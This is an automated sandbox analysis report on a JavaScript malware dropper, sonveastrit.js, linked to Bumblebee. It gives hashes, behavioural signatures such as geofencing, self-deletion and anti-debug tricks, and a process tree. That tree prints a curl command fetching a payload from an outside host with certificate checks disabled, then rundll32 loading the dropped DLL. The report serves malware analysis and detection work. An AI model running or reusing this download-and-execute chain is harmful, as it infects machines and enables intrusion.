Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
14-03-2024 12:52
Static task
static1
Behavioral task
behavioral1
Sample
sonveastrit.js
Resource
win7-20240215-en
General
-
Target
sonveastrit.js
-
Size
15KB
-
MD5
517affe6e5fe79afcf4f49cb46d8a3cc
-
SHA1
bb44562c59f77c63c1fa1fa28ba67d064eed2ad0
-
SHA256
8c169aa9c23673c84cbea07e7ef8fdd7f2458856f8dfcdb5c1723e9a20a79b0d
-
SHA512
81bb3f498baf5c012173a0dedd7981ed4747649f8dd010f4fa8d2f2b75ea574e337dd0306a7546307455bc02f0599f959e85ff041d8fbb7a42f5660a1f05f473
-
SSDEEP
384:j1pkU3o9kMw9bLSXfm96YPnA3AQzkkBRBYOC72lN:Ef9sLvAzxh
Malware Config
Extracted
bumblebee
asd1234
Signatures
-
Blocklisted process makes network request 8 IoCs
flow pid Process 48 4520 rundll32.exe 60 4520 rundll32.exe 77 4520 rundll32.exe 80 4520 rundll32.exe 83 4520 rundll32.exe 91 4520 rundll32.exe 96 4520 rundll32.exe 101 4520 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation wscript.exe -
Deletes itself 1 IoCs
pid Process 2772 wscript.exe -
Loads dropped DLL 1 IoCs
pid Process 4520 rundll32.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4520 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2772 wrote to memory of 820 2772 wscript.exe 87 PID 2772 wrote to memory of 820 2772 wscript.exe 87 PID 820 wrote to memory of 4320 820 cmd.exe 89 PID 820 wrote to memory of 4320 820 cmd.exe 89 PID 2772 wrote to memory of 4520 2772 wscript.exe 102 PID 2772 wrote to memory of 4520 2772 wscript.exe 102
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\sonveastrit.js1⤵
- Checks computer location settings
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\howeathermsych.sonapitheip.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\system32\curl.execurl "https://cmskk.guruygn.com/h/5.16.25/8b3fa8dd-6771-38b6-b487-4b05ef4b2b3f/p/386.php" --output "C:/Users/Admin/AppData/Local/coundispbernalould.careastakentelfirdin" --ssl-no-revoke --insecure --location3⤵PID:4320
-
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:/Users/Admin/AppData/Local/whessistarddrafferseeta.nuasseonerch" HUF_inc_var2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:4520
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.6MB
MD5402829ed22e8fa54eaa8a5adc0e47839
SHA1d292171c9d9803c3619933d35524d0f6cd3194d0
SHA256fbd3570c98fbd3b3bf71a9b20c9039637035868ae747af7d3a19468f55445806
SHA51206ef0c4cd84d0fee47179414879eb9812ffd98c2ae490737ccf6a67a883104008267f9d5425a3e381a8621de5fcb6b682399ad2e808f55660c7507dc55df9179
-
Filesize
207B
MD55e2ca42b6e1114d6001ca0dcc06b3592
SHA1537278094a481b3f385b6e47edaf655b78aff66c
SHA2569f3c8ebd8cd0f9c1e22317caf6de64ce5eb97949ed71bd80ac604d68bd902ee1
SHA5120130f9a683a122b671fb9126fb2d498787f674ecfb4dcfb467a7e2b24f4917cf7a590aa56c028b16fdbe33efe774680fa93b17ca20a55e4102498d6dc8a3b668